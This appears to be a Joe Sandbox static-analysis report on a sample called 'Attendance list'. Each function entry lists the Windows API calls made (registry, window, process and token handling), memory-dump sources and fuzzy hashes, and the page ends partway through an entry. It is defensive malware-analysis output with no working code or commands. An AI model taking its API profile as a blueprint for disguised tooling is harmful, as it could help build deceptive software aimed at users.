                        • API String ID: 3489934621-340411864
                        • Opcode ID: 769ebb6b987618e154eb23a9b5293e5917c17f811afa796344b5fb688e3fc98f
                        • Instruction ID: 2e52fa8ade45b06d03f26a419fe20289594f0fd2625507f57ea022e3953c3bec
                        • Opcode Fuzzy Hash: 769ebb6b987618e154eb23a9b5293e5917c17f811afa796344b5fb688e3fc98f
                        • Instruction Fuzzy Hash: 35E0E5B86AC342AAEB205FB2EC1DF043AA4BB66B46F504424B921D51E0DBB54095AB00
                        Function 008E429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008E41B8), ref: 008E42B8
                        • GetProcAddress.KERNEL32(00000000), ref: 008E42BF
                        • EncodePointer.KERNEL32(00000000), ref: 008E42CA
                        • DecodePointer.KERNEL32(008E41B8), ref: 008E42E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                        • String ID: RoUninitialize$combase.dll
                        • API String ID: 3489934621-2819208100
                        • Opcode ID: 828e7595d1f03be013207e36463ab58782d5b2a18b8e90fb49d1085c8e21a89c
                        • Instruction ID: 81df5ecf4b408230da8f7db137b27d91225997329143016219a8b734a84bd227
                        • Opcode Fuzzy Hash: 828e7595d1f03be013207e36463ab58782d5b2a18b8e90fb49d1085c8e21a89c
                        • Instruction Fuzzy Hash: A0E0B67C5AD303ABEB109F61EC1DF053AA4FB26B86F105034F515E52A0DBB58584EB14
                        Function 0092675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove$__itow__swprintf
                        • String ID:
                        • API String ID: 3253778849-0
                        • Opcode ID: 85db79b2357762b9e250be41096e75e0a8b11e2f4c8f4dceac26103551ccb84f
                        • Instruction ID: c81ceb859e69e88cc25b81ab0fe70d2e38791af7750320ce195ce6a15a4544b2
                        • Opcode Fuzzy Hash: 85db79b2357762b9e250be41096e75e0a8b11e2f4c8f4dceac26103551ccb84f
                        • Instruction Fuzzy Hash: E661AD305006AA9BCF11EF28D885FFE37A8FF45308F054459F8999B296DA34ED45CB52
                        Function 0094046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 009410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00940038,?,?), ref: 009410BC
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00940548
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00940588
                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009405AB
                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009405D4
                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00940617
                        • RegCloseKey.ADVAPI32(00000000), ref: 00940624
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                        • String ID:
                        • API String ID: 4046560759-0
                        • Opcode ID: c64341c8a8f57a3959e4c41654570cfff46164ecd575b49e3b63b4f135aff53b
                        • Instruction ID: 5033a8688d80bd2849fa7e81d8227c13475d5796677fc624342e7ca38c4f4cfe
                        • Opcode Fuzzy Hash: c64341c8a8f57a3959e4c41654570cfff46164ecd575b49e3b63b4f135aff53b
                        • Instruction Fuzzy Hash: FD514731608240AFCB14EF68C885E6BBBF8FF89314F04491DF596972A2DB71E944DB52
                        Function 00945A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenu.USER32(?), ref: 00945A82
                        • GetMenuItemCount.USER32(00000000), ref: 00945AB9
                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00945AE1
                        • GetMenuItemID.USER32(?,?), ref: 00945B50
                        • GetSubMenu.USER32(?,?), ref: 00945B5E
                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00945BAF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Menu$Item$CountMessagePostString
                        • String ID:
                        • API String ID: 650687236-0
                        • Opcode ID: 1d9788fa5cf2cc04e5206c23b1a8aaceeedf91f049052f0f6b57263d0f634402
                        • Instruction ID: 6c8017432aadf4071b1bf3ac01f2e6874da83b9b6c59dcf7d90550b9fcede20f
                        • Opcode Fuzzy Hash: 1d9788fa5cf2cc04e5206c23b1a8aaceeedf91f049052f0f6b57263d0f634402
                        • Instruction Fuzzy Hash: 28518F35A00A25EFCF11EFA4C845EAEB7B4FF48310F1144A9E855BB352DB74AE418B91
                        Function 0091F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 0091F3F7
                        • VariantClear.OLEAUT32(00000013), ref: 0091F469
                        • VariantClear.OLEAUT32(00000000), ref: 0091F4C4
                        • _memmove.LIBCMT ref: 0091F4EE
                        • VariantClear.OLEAUT32(?), ref: 0091F53B
                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0091F569
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Variant$Clear$ChangeInitType_memmove
                        • String ID:
                        • API String ID: 1101466143-0
                        • Opcode ID: c51677c16da3e3b88242f5568d7b768f1561369153ed2c2a105ecccdae74cfba
                        • Instruction ID: 76308a6795e4d0338253d1f76ff2395139561fb7fdf5b2261730ca54b0a164e8
                        • Opcode Fuzzy Hash: c51677c16da3e3b88242f5568d7b768f1561369153ed2c2a105ecccdae74cfba
                        • Instruction Fuzzy Hash: 885177B5A0020EAFCB14CF58D894EAAB7F9FF48314B158569F949DB350D730E951CBA0
                        Function 009226F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00922747
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00922792
                        • IsMenu.USER32(00000000), ref: 009227B2
                        • CreatePopupMenu.USER32 ref: 009227E6
                        • GetMenuItemCount.USER32(000000FF), ref: 00922844
                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00922875
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                        • String ID:
                        • API String ID: 3311875123-0
                        • Opcode ID: e7cc88cac57913f3f0ee8680aef342785679aeaab60ff29bbfde6de5ca412e24
                        • Instruction ID: fc3458933175e1b0c6822ff1e309cd4708b9cb724b8943f34511616abbf14a22
                        • Opcode Fuzzy Hash: e7cc88cac57913f3f0ee8680aef342785679aeaab60ff29bbfde6de5ca412e24
                        • Instruction Fuzzy Hash: 3351A27090426AFFDF24CF68E888BAEBBF8AF45314F104669E4119B299D770D944CB51
                        Function 008C1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 008C179A
                        • GetWindowRect.USER32(?,?), ref: 008C17FE
                        • ScreenToClient.USER32(?,?), ref: 008C181B
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008C182C
                        • EndPaint.USER32(?,?), ref: 008C1876
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                        • String ID:
                        • API String ID: 1827037458-0
                        • Opcode ID: 85aa94513c930fac3efa91c902ec5911e4d86c7ea481a8d62612b254baf04a07
                        • Instruction ID: 0b674f040002bda70a1c49c2dc427a7df874a6e573870c39df54d8dfbc1f5367
                        • Opcode Fuzzy Hash: 85aa94513c930fac3efa91c902ec5911e4d86c7ea481a8d62612b254baf04a07
                        • Instruction Fuzzy Hash: CC416D701182059FDB10DF24C8C8FB67BF8FB4A724F140669F9A5CA2A2C731D845EB62
                        Function 0094B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                        Download Yara Rule
                        APIs
                        • ShowWindow.USER32(009867B0,00000000,00FF55E8,?,?,009867B0,?,0094B862,?,?), ref: 0094B9CC
                        • EnableWindow.USER32(00000000,00000000), ref: 0094B9F0
                        • ShowWindow.USER32(009867B0,00000000,00FF55E8,?,?,009867B0,?,0094B862,?,?), ref: 0094BA50
                        • ShowWindow.USER32(00000000,00000004,?,0094B862,?,?), ref: 0094BA62
                        • EnableWindow.USER32(00000000,00000001), ref: 0094BA86
                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0094BAA9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        • Opcode ID: bb62e14a7f68ed8034e5d1d5b8b8dbf2dcfaa464a13067f33719660c126a1e46
                        • Instruction ID: 39206b8f6675c05a56c9820f1de770b7d265181661cddeffdf70c4cc488d2754
                        • Opcode Fuzzy Hash: bb62e14a7f68ed8034e5d1d5b8b8dbf2dcfaa464a13067f33719660c126a1e46
                        • Instruction Fuzzy Hash: 8E416034604641AFDB26CF24C499F957BE4FF0A314F1842B9FA488F2A2C731E849DB51
                        Function 009373B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00935134,?,?,00000000,00000001), ref: 009373BF
                          • Part of subcall function 00933C94: GetWindowRect.USER32(?,?), ref: 00933CA7
                        • GetDesktopWindow.USER32 ref: 009373E9
                        • GetWindowRect.USER32(00000000), ref: 009373F0
                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00937422
                          • Part of subcall function 009254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0092555E
                        • GetCursorPos.USER32(?), ref: 0093744E
                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009374AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                        • String ID:
                        • API String ID: 4137160315-0
                        • Opcode ID: 59398b6338f5caccdb10149c1c92e05869a90fc4d24986df03bfe01366156e15
                        • Instruction ID: 5825b62df3758b0d88e63f32fdd2635c3430500bfe2ee4af2fe562f4bd72b974
                        • Opcode Fuzzy Hash: 59398b6338f5caccdb10149c1c92e05869a90fc4d24986df03bfe01366156e15
                        • Instruction Fuzzy Hash: A431D572508316AFD720DF54D849F9BBBEAFF89314F004919F59997191D730E908CB92
                        Function 00918D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009185F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00918608
                          • Part of subcall function 009185F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00918612
                          • Part of subcall function 009185F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00918621
                          • Part of subcall function 009185F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00918628
                          • Part of subcall function 009185F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0091863E
                        • GetLengthSid.ADVAPI32(?,00000000,00918977), ref: 00918DAC
                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00918DB8
                        • HeapAlloc.KERNEL32(00000000), ref: 00918DBF
                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00918DD8
                        • GetProcessHeap.KERNEL32(00000000,00000000,00918977), ref: 00918DEC
                        • HeapFree.KERNEL32(00000000), ref: 00918DF3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                        • String ID:
                        • API String ID: 3008561057-0
                        • Opcode ID: f68a00d17328910b78796e031100f5887428cb2c64a9f599e25263a5a18a251e
                        • Instruction ID: 9531db6ba49b22c3eca6cf34df83b608320b5cce247d80bcea9ff59f87bdaf81
                        • Opcode Fuzzy Hash: f68a00d17328910b78796e031100f5887428cb2c64a9f599e25263a5a18a251e
                        • Instruction Fuzzy Hash: F211CA3961460AFBDB108FA4EC59FEF7BADEB46315F104029E84593290CB329980EB60
                        Function 00918AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00918B2A
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00918B31
                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00918B40
                        • CloseHandle.KERNEL32(00000004), ref: 00918B4B
                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00918B7A
                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00918B8E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                        • String ID:
                        • API String ID: 1413079979-0
                        • Opcode ID: f0ba6bd5dbdff5831f0cdc08948350a0280f1097daf1f588a06cb9e3b4ee12b3
                        • Instruction ID: 759fa74ed8a773b55711cb33843c4ed7a201558880a8675f7bb8c7a68d71e408
                        • Opcode Fuzzy Hash: f0ba6bd5dbdff5831f0cdc08948350a0280f1097daf1f588a06cb9e3b4ee12b3
                        • Instruction Fuzzy Hash: 77116DB664420EABDF118FA4ED49FDE7BADEF49304F044064FE05A2160C7758D60EB60
                        Function 0094C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008C134D
                          • Part of subcall function 008C12F3: SelectObject.GDI32(?,00000000), ref: 008C135C
                          • Part of subcall function 008C12F3: BeginPath.GDI32(?), ref: 008C1373
                          • Part of subcall function 008C12F3: SelectObject.GDI32(?,00000000), ref: 008C139C
                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0094C1C4
                        • LineTo.GDI32(00000000,00000003,?), ref: 0094C1D8
                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0094C1E6
                        • LineTo.GDI32(00000000,00000000,?), ref: 0094C1F6
                        • EndPath.GDI32(00000000), ref: 0094C206
                        • StrokePath.GDI32(00000000), ref: 0094C216
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                        • String ID:
                        • API String ID: 43455801-0
                        • Opcode ID: 311573e2265eca33a7d6e860c176f85f25dce5a534ce5b06add9e646c642cd6d
                        • Instruction ID: 851936f8581b95ec1d85ed4f3e66826bec486d2012064e327a91d0bb15c7ac07
                        • Opcode Fuzzy Hash: 311573e2265eca33a7d6e860c176f85f25dce5a534ce5b06add9e646c642cd6d
                        • Instruction Fuzzy Hash: 37111B7A41814DBFDF119F94DC88FAA7FADEB09354F048021BA188A161C7B19D55EBA0
                        Function 008E03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E03D3
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 008E03DB
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E03E6
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E03F1
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 008E03F9
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008E0401
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        • Opcode ID: 85f8e5c7de1654a39252d4221bde2eb2f7da3a266f32d9feb9a14c71d944ec73
                        • Instruction ID: 0389320a26472f11fa891d78a3474db51c0330c124c6bb59d47db38c3b915628
                        • Opcode Fuzzy Hash: 85f8e5c7de1654a39252d4221bde2eb2f7da3a266f32d9feb9a14c71d944ec73
                        • Instruction Fuzzy Hash: C8016CB090275A7DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                        Function 0092568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0092569B
                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009256B1
                        • GetWindowThreadProcessId.USER32(?,?), ref: 009256C0
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009256CF
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009256D9
                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009256E0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                        • String ID:
                        • API String ID: 839392675-0
                        • Opcode ID: 215ce2d97e4be13267263a714468860ec577ab4e243ebba5b2099c8742e07d5a
                        • Instruction ID: 75f8d80a39b7b9e95c5310b2e7ac5ddc186d91d6ce2478abf5b4f698094803cc
                        • Opcode Fuzzy Hash: 215ce2d97e4be13267263a714468860ec577ab4e243ebba5b2099c8742e07d5a
                        • Instruction Fuzzy Hash: 33F0903625915ABBE3205BA2EC0DEEF7B7CEFCBB11F000169FA00D1050D7A01A0196B5
                        Function 009274D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(?,?), ref: 009274E5
                        • EnterCriticalSection.KERNEL32(?,?,008D1044,?,?), ref: 009274F6
                        • TerminateThread.KERNEL32(00000000,000001F6,?,008D1044,?,?), ref: 00927503
                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,008D1044,?,?), ref: 00927510
                          • Part of subcall function 00926ED7: CloseHandle.KERNEL32(00000000,?,0092751D,?,008D1044,?,?), ref: 00926EE1
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00927523
                        • LeaveCriticalSection.KERNEL32(?,?,008D1044,?,?), ref: 0092752A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
